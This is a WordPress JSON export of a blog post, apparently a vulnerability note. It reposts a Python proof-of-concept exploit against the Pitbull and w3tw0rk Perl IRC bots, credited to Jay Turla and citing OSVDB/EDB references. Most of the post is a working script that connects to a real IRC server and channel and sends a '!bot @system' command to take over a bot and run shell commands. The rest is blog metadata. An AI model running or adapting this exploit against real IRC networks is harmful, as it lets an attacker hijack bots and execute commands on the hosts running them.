The Pitbull and w3tw0rk IRC bots contain a flaw that is triggered as input is not properly sanitized when handling channel PRIVMSGs. This may allow a remote attacker to execute arbitrary commands.<\/p>\n
# thehunter.py\n# Exploit Title: Pitbull \/ w3tw0rk Perl IRC Bot Remote Code Execution\n# Author: Jay Turla ( @shipcod3 )\n# Description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.\nimport socket\nimport sys\ndef usage():\n print(\"USAGE: python thehunter.py nick \\n\") \ndef main(argv):\n if len(argv) < 2:\n return usage()\n #irc server connection settings\n botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot\n server = \"us.dal.net\" #irc server\n channel = \"#buhaypirata\" #channel where the bot is located\n irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket\n print \"connecting to:\"+server\n irc.connect((server, 6667)) #connects to the server\n irc.send(\"USER \"+ botnick +\" \"+ botnick +\" \"+ botnick +\" :I eat w3tw0rk bots!\\n\") #user authentication\n irc.send(\"NICK \"+ botnick +\"\\n\") #sets nick\n irc.send(\"JOIN \"+ channel +\"\\n\") #join the chan\n irc.send(\"PRIVMSG \"+channel+\" :!bot @system 'uname -a' \\n\") #send the payload to the bot\n while 1: #puts it in a loop\n text=irc.recv(2040) #receive the text\n print text #print text to console\n if text.find('PING') != -1: #check if 'PING' is found\n irc.send('PONG ' + text.split() [1] + '\\r\\n') #returnes 'PONG' back to the server (prevents pinging out!)\n if text.find('!quit') != -1: #quit the Bot\n irc.send (\"QUIT\\r\\n\") \n sys.exit()\n if text.find('Linux') != -1: \n irc.send(\"PRIVMSG \"+channel+\" :The bot answers to \"+botnick+\" which allows command execution \\r\\n\")\n irc.send (\"QUIT\\r\\n\")\n sys.exit()\nif __name__ == \"__main__\":\n main(sys.argv)\n<\/pre>\nReferences<\/h1>\n\n- OSVDB-120384<\/a><\/li>\n
- EDB-36652<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"
The Pitbull and w3tw0rk IRC bots contain a flaw that is triggered as input is not properly sanitized when handling channel PRIVMSGs. This may allow a remote attacker to execute arbitrary commands. # thehunter.py # Exploit Title: Pitbull \/ w3tw0rk Perl IRC Bot Remote Code Execution # Author: Jay Turla ( @shipcod3 ) # Description:<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[570,431],"tags":[571,572,573,574],"class_list":["post-2598","post","type-post","status-publish","format-standard","hentry","category-botnet","category-vulnerability-analysis","tag-cmd","tag-irc-bot","tag-jay-turla","tag-w3tw0rk"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2598","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2598"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2598\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2598"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2598"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2598"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}